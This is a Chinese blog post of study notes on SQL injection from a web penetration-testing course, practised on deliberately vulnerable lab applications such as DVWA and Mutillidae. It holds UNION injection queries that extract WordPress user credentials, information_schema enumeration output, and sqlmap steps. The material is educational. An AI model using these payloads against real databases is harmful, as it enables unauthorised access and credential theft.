《Web安全渗透全套教程(40集)》学习笔记 | SQL注入攻击及防御
2023-09-14 09:09:09 时间
学习视频来源:B站《Web安全渗透全套教程(40集)》
个人在学习的同时,也验证了视频中的实验部分,现将授课笔记和实验笔记整理下来。
SQL注入危害
SQL基础回顾
连接数据库
查看数据库:show databases
进入dvwa数据库
查看表
查看表结构
查看表记录
select * from dvwa.users union select 1,2,3,4,5,6,猜测出系统的字段数量,再用select * from dvwa.users union select user_login,user_pass,1,2,3,4 from wordpress.wp_users; 获取想要的内容(可以增加where 1=3,这样不成立的条件,过滤掉之前的不想要的内容)
information_schema
use information_schema.tables,里面存放了所有数据库和数据表的元信息
select * from information_schema.TABLES\G,查所有库和所有表
select DISTINCT TABLE_SCHEMA from information_schema.TABLES; //等价于show databases
mysql> select DISTINCT TABLE_SCHEMA from information_schema.TABLES;
+--------------------+
| TABLE_SCHEMA |
+--------------------+
| information_schema |
| bricks |
| bwapp |
| citizens |
| cryptomg |
| dvwa |
| gallery2 |
| getboo |
| ghost |
| gtd-php |
| hex |
| isp |
| joomla |
| mutillidae |
| mysql |
| nowasp |
| orangehrm |
| personalblog |
| peruggia |
| phpbb |
| phpmyadmin |
| proxy |
| rentnet |
| sqlol |
| tikiwiki |
| vicnum |
| wackopicko |
| wavsepdb |
| webcal |
| webgoat_coins |
| wordpress |
| wraithlogin |
| yazd |
+--------------------+
33 rows in set (0.00 sec)
mysql>select TABLE_SCHEMA,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES GROUP BY TABLE_SCHEMA\G,对数据库中的表进行了分组和整合
mysql> select TABLE_SCHEMA,GROUP_CONCAT(TABLE_NAME) from information_schema.TABLES GROUP BY TABLE_SCHEMA\G
*************************** 1. row ***************************
TABLE_SCHEMA: bricks
GROUP_CONCAT(TABLE_NAME): users
*************************** 2. row ***************************
TABLE_SCHEMA: bwapp
GROUP_CONCAT(TABLE_NAME): users,movies,heroes,blog
*************************** 3. row ***************************
TABLE_SCHEMA: citizens
GROUP_CONCAT(TABLE_NAME): logins
*************************** 4. row ***************************
TABLE_SCHEMA: cryptomg
GROUP_CONCAT(TABLE_NAME): challenge4_users,challenge2_users,challenge2_articles
*************************** 5. row ***************************
TABLE_SCHEMA: dvwa
GROUP_CONCAT(TABLE_NAME): users,guestbook
*************************** 6. row ***************************
TABLE_SCHEMA: gallery2
GROUP_CONCAT(TABLE_NAME): g2_dataitem,g2_externalidmap,g2_imageblockdisabledmap,g2_movieitem,g2_pluginpackagemap,g2_schema,g2_tkoperatnparametermap,g2_accessmap,g2_customfieldmap,g2_exifpropertiesmap,g2_imageblockcachemap,g2_mimetypemap,g2_pluginmap,g2_rssmap,g2_tkoperatnmimetypemap,g2_watermarkimage,g2_comment,g2_entity,g2_group,g2_maintenancemap,g2_photoitem,g2_recoverpasswordmap,g2_tkoperatnmap,g2_usergroupmap,g2_childentity,g2_descendentcountsmap,g2_getid3propsmap,g2_lock,g2_permissionsetmap,g2_ratingmap,g2_thumbnailimage,g2_user,g2_cachemap,g2_derivativeprefsmap,g2_g1migratemap,g2_linkitem,g2_permalinksmap,g2_ratingcachemap,g2_sessionmap,g2_unknownitem,g2_animationitem,g2_derivativeimage,g2_filesystementity,g2_itemattributesmap,g2_pendinguser,g2_quotasmap,g2_sequencelock,g2_tkpropertymimetypemap,g2_albumitem,g2_derivative,g2_factorymap,g2_item,g2_multilangitemmap,g2_pluginparametermap,g2_sequenceid,g2_tkpropertymap,g2_accesssubscribermap
*************************** 7. row ***************************
TABLE_SCHEMA: getboo
GROUP_CONCAT(TABLE_NAME): favourites,newshits,activation,ebhints,news,configs_groups,loginhits,tags_books,configs,gsubscriptions,tags_added,comments,groups,tags,captchahits,gfolders,session,bookmarkhits,folders,searches,bookexportimport
*************************** 8. row ***************************
TABLE_SCHEMA: ghost
GROUP_CONCAT(TABLE_NAME): q
*************************** 9. row ***************************
TABLE_SCHEMA: gtd-php
GROUP_CONCAT(TABLE_NAME): categories,itemstatus,tickler,items,projectstatus,itemattributes,projects,goals,projectattributes,context,nextactions,checklistitems,listitems,checklist,list,timeitems
*************************** 10. row ***************************
TABLE_SCHEMA: hex
GROUP_CONCAT(TABLE_NAME): loginhistory
*************************** 11. row ***************************
TABLE_SCHEMA: information_schema
GROUP_CONCAT(TABLE_NAME): COLUMN_PRIVILEGES,PARTITIONS,SCHEMA_PRIVILEGES,TRIGGERS,COLUMNS,KEY_COLUMN_USAGE,SCHEMATA,TABLE_PRIVILEGES,COLLATION_CHARACTER_SET_APPLICABILITY,GLOBAL_VARIABLES,ROUTINES,TABLE_CONSTRAINTS,COLLATIONS,GLOBAL_STATUS,REFERENTIAL_CONSTRAINTS,TABLES,CHARACTER_SETS,FILES,PROFILING,STATISTICS,EVENTS,PROCESSLIST,SESSION_VARIABLES,VIEWS,ENGINES,PLUGINS,SESSION_STATUS,USER_PRIVILEGES
*************************** 12. row ***************************
TABLE_SCHEMA: isp
GROUP_CONCAT(TABLE_NAME): users
*************************** 13. row ***************************
TABLE_SCHEMA: joomla
GROUP_CONCAT(TABLE_NAME): jos_vm_product_mf_xref,jos_menu_types,jos_vm_product_votes,jos_plugins,jos_vm_tax_rate,jos_stats_agents,jos_vm_category,jos_vm_export,jos_vm_zone_shipping,jos_categories,jos_core_acl_aro_groups,jos_vm_module,jos_vm_payment_method,jos_vm_product_files,jos_menu,jos_newsfeeds,jos_vm_product_type_parameter,jos_vm_state,jos_session,jos_vm_waiting_list,jos_vm_cart,jos_vm_currency,jos_bannertrack,jos_core_acl_aro,jos_vm_manufacturer_category,jos_vm_orders,jos_vm_product_download,jos_groups,jos_modules_menu,jos_vm_product_type,jos_vm_shopper_vendor_xref,jos_sections,jos_vm_vendor_category,jos_vm_auth_user_vendor,jos_vm_csv,jos_bannerclient,jos_content_rating,jos_vm_order_user_info,jos_vm_product_discount,jos_core_log_searches,jos_modules,jos_vm_product_reviews,jos_vm_shopper_group,jos_polls,jos_vm_vendor,jos_vm_auth_user_group,jos_vm_creditcard,jos_banner,jos_content_frontpage,jos_vm_order_status,jos_vm_product_category_xref,jos_core_log_items,jos_migration_backlinks,jos_vm_product_relations,jos_vm_shipping_rate,jos_
*************************** 14. row ***************************
TABLE_SCHEMA: mutillidae
GROUP_CONCAT(TABLE_NAME): help_texts,credit_cards,captured_data,pen_test_tools,blogs_table,page_hints,balloon_tips,page_help,accounts,level_1_help_include_files,hitlog
*************************** 15. row ***************************
TABLE_SCHEMA: mysql
GROUP_CONCAT(TABLE_NAME): db,help_topic,slow_log,user,columns_priv,help_relation,servers,time_zone_transition_type,help_keyword,procs_priv,time_zone_transition,help_category,proc,time_zone_name,general_log,plugin,time_zone_leap_second,func,ndb_binlog_index,time_zone,event,host,tables_priv
*************************** 16. row ***************************
TABLE_SCHEMA: nowasp
GROUP_CONCAT(TABLE_NAME): accounts,level_1_help_include_files,hitlog,help_texts,credit_cards,youtubevideos,captured_data,pen_test_tools,blogs_table,page_hints,balloon_tips,page_help
*************************** 17. row ***************************
TABLE_SCHEMA: orangehrm
GROUP_CONCAT(TABLE_NAME): hs_hr_employee_timesheet_period,hs_hr_geninfo,hs_hr_job_spec,hs_hr_config,hs_hr_leavetype,hs_hr_db_version,hs_hr_emp_children,hs_hr_nationality,hs_hr_rights,hs_hr_emp_jobtitle_history,hs_hr_users,hs_hr_emp_picture,hs_hr_employee_leave_quota,hs_hr_file_version,hs_hr_job_application_events,hs_hr_compstructtree,hs_hr_leave_requests,hs_hr_customer,hs_hr_emp_basicsalary,hs_hr_module,hs_hr_province,hs_hr_emp_history_of_ealier_pos,hs_hr_user_group,hs_hr_emp_passport,hs_hr_employee,hs_hr_ethnic_race,hs_hr_job_application,hs_hr_comp_property,hs_hr_leave,hs_hr_custom_import,hs_hr_emp_attachment,hs_hr_membership_type,hs_hr_project_admin,hs_hr_emp_emergency_contacts,hs_hr_unique_id,hs_pr_salary_grade,hs_hr_emp_member_detail,hs_hr_emp_work_experience,hs_hr_empstat,hs_hr_hsp_summary,hs_hr_language,hs_hr_custom_fields,hs_hr_eec,hs_hr_membership,hs_hr_project_activity,hs_hr_emp_education,hs_hr_timesheet_submission_period,hs_hr_emp_locations,hs_pr_salary_currency_detail,hs_hr_emp_us_tax,hs_hr_empreport,hs_hr_hsp_payment_reque
*************************** 18. row ***************************
TABLE_SCHEMA: personalblog
GROUP_CONCAT(TABLE_NAME): t_posts,t_comments,t_referrers
*************************** 19. row ***************************
TABLE_SCHEMA: peruggia
GROUP_CONCAT(TABLE_NAME): users,picdata
*************************** 20. row ***************************
TABLE_SCHEMA: phpbb
GROUP_CONCAT(TABLE_NAME): phpbb_disallow,phpbb_privmsgs_text,phpbb_themes,phpbb_vote_results,phpbb_config,phpbb_privmsgs,phpbb_smilies,phpbb_vote_desc,phpbb_categories,phpbb_posts_text,phpbb_sessions,phpbb_users,phpbb_banlist,phpbb_posts,phpbb_search_wordmatch,phpbb_user_group,phpbb_auth_access,phpbb_groups,phpbb_search_wordlist,phpbb_topics_watch,phpbb_forums,phpbb_search_results,phpbb_topics,phpbb_words,phpbb_forum_prune,phpbb_ranks,phpbb_themes_name,phpbb_vote_voters
*************************** 21. row ***************************
TABLE_SCHEMA: phpmyadmin
GROUP_CONCAT(TABLE_NAME): pma_pdf_pages,pma_history,pma_designer_coords,pma_column_info,pma_bookmark,pma_table_info,pma_table_coords,pma_relation
*************************** 22. row ***************************
TABLE_SCHEMA: proxy
GROUP_CONCAT(TABLE_NAME): users,logs
*************************** 23. row ***************************
TABLE_SCHEMA: rentnet
GROUP_CONCAT(TABLE_NAME): logins
*************************** 24. row ***************************
TABLE_SCHEMA: sqlol
GROUP_CONCAT(TABLE_NAME): ssn,users
*************************** 25. row ***************************
TABLE_SCHEMA: tikiwiki
GROUP_CONCAT(TABLE_NAME): tiki_quizzes,tiki_user_tasks_history,sessions,tiki_games,tiki_score,tiki_webmail_contacts,tiki_blog_activity,tiki_images_data,tiki_calendar_roles,tiki_sent_newsletters,tiki_live_support_events,tiki_stats,tiki_charts,users_permissions,tiki_mail_events,tiki_surveys,tiki_content,tiki_modules,tiki_tracker_item_attachments,tiki_directory_sites,tiki_page_footnotes,tiki_untranslated,tiki_faq_questions,tiki_private_messages,tiki_user_menus,galaxia_processes,tiki_forum_reads,tiki_quiz_stats_sum,tiki_user_tasks,messu_sent,tiki_galleries_scales,tiki_rss_modules,tiki_users_score,tiki_banning_sections,tiki_images,tiki_semaphores,tiki_calendar_locations,tiki_links,tiki_shoutbox_words,tiki_chart_items,users_objectpermissions,tiki_logs,tiki_survey_questions,tiki_comments,tiki_minical_topics,tiki_directory_search,tiki_object_ratings,tiki_tracker_fields,tiki_translated_objects,tiki_extwiki,tiki_preferences,galaxia_instances,tiki_user_mail_accounts,tiki_forum_attachments,tiki_user_taken_quizzes,messu_messages,tiki_galleries,tik
*************************** 26. row ***************************
TABLE_SCHEMA: vicnum
GROUP_CONCAT(TABLE_NAME): unionresults,jottoresults,guessnumresults
*************************** 27. row ***************************
TABLE_SCHEMA: wackopicko
GROUP_CONCAT(TABLE_NAME): admin_session,coupons,admin,conflict_pictures,comments_preview,comments,users,cart_items,pictures,cart_coupons,own,cart,guestbook
*************************** 28. row ***************************
TABLE_SCHEMA: wavsepdb
GROUP_CONCAT(TABLE_NAME): transactions,messages,accounts,users
*************************** 29. row ***************************
TABLE_SCHEMA: webcal
GROUP_CONCAT(TABLE_NAME): webcal_nonuser_cals,webcal_user_pref,webcal_entry_log,webcal_import_data,webcal_user_layers,webcal_entry_ext_user,webcal_import,webcal_user,webcal_entry,webcal_group_user,webcal_site_extras,webcal_config,webcal_group,webcal_report_template,webcal_categories,webcal_entry_user,webcal_report,webcal_view_user,webcal_asst,webcal_entry_repeats_not,webcal_reminder_log,webcal_view,webcal_entry_repeats
*************************** 30. row ***************************
TABLE_SCHEMA: webgoat_coins
GROUP_CONCAT(TABLE_NAME): employees,customers,securityquestions,customerlogin,products,comments,payments,categories,orders,orderdetails,offices
*************************** 31. row ***************************
TABLE_SCHEMA: wordpress
GROUP_CONCAT(TABLE_NAME): wp_categories,wp_options,wp_mypictures,wp_users,wp_mygprelation,wp_usermeta,wp_mygallery,wp_spreadsheet,wp_links,wp_posts,wp_linkcategories,wp_postmeta,wp_comments,wp_post2cat
*************************** 32. row ***************************
TABLE_SCHEMA: wraithlogin
GROUP_CONCAT(TABLE_NAME): mail,users,stealth
*************************** 33. row ***************************
TABLE_SCHEMA: yazd
GROUP_CONCAT(TABLE_NAME): yazdgroupperm,yazduserperm,yazdgroup,yazduser,yazdforumprop,yazdthread,yazdforum,yazdmessagetree,yazdfilter,yazdmessageprop,yazdmessage,yazdgroupuser,yazduserprop
33 rows in set, 1 warning (0.00 sec)
mysql>select COLUMN_NAME from information_schema.columns; //获得所有库和所有表的列信息(但无意义)
select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA='proxy' and TABLE_NAME='logs'; //按需获取某个数据库、表的列名
mysql> select COLUMN_NAME from information_schema.columns where TABLE_SCHEMA='proxy' and TABLE_NAME='logs';
+-------------+
| COLUMN_NAME |
+-------------+
| userid |
| source |
| target |
| timestamp |
+-------------+
4 rows in set (0.00 sec)
mysql>SQL注入流程
基于错误的注入
尝试输入',试探错误,但无法获得信息
基于布尔的注入
第一个'用于闭合前面的条件;or 1=1 为真的条件;--将注释后面的所有语句
基于UNION注入
基于时间的盲注
前面要是真条件
sqlmap自动化注入
GET方法注入
选择OWASP Multillidae II,选择无需登录的页面做注入
输入任意用户名和密码,选择URL,使用sqlmap注入
sqlmap -u注入
扫描成功,会保存到指定目录
sqlmap增加 --dbs,获得所有数据库信息
获得所有用户
获得当前用户
整理的参数
获取指定表的指定列的值
整理的示例
POST方法注入
需要带cookie才能访问的注入页面,--cookie=""
数据获取
提权操作
综合实例
相关文章
- 渗透测试|开发过程中关于重放攻击的防御方法
- SQL注入基本原理_sql到底怎么注入
- Oracle注入:防止命令攻击(oracle注入命令)
- 环境预防SQL注入, 把Oracle环境保护好(sql注入oracle)
- 防范Oracle注入攻击 保障权限提升安全(oracle注入提权)
- 防止MongoDB受到SQL注入攻击(mongodb防注入)
- 尝试抵御:SQL Server注入攻击(sqlserver注入)
- 《30天打造安全工程师》第22天:SQL注入攻击继续深化
- Python与Java曝漏洞,黑客利用FTP注入攻击可绕过防火墙
- 如何防止MySQL注入攻击并避免数据库爆表?(mysql注入爆表)
- MySQL注入攻击及其过滤防范(mysql注入过滤)
- MySQL中使用绑定变量防止SQL注入攻击(mysql绑定变量)
- MSSQL实现SQL注入防护的完美解决方案(mssql 防sql注入)
- MSSQL登录框注入攻击预防策略(mssql 登录框注入)
- MSSQL 注入攻击:警惕路径穿越危机(mssql 注入爆路径)
- MSSQL中防范注入攻击的有效措施(mssql注入怎么过滤)
- PHP与SQL注入攻击[三]
- JSP防范SQL注入攻击分析
- asp.net预防SQL注入攻击之我见
- SQL数据库的高级sql注入的一些知识
- PHP+SQL注入攻击的技术实现以及预防办法
- 细谈php中SQL注入攻击与XSS攻击
- Sql学习第一天——SQL练习题(建表/sql语句)
- PHP防止注入攻击实例分析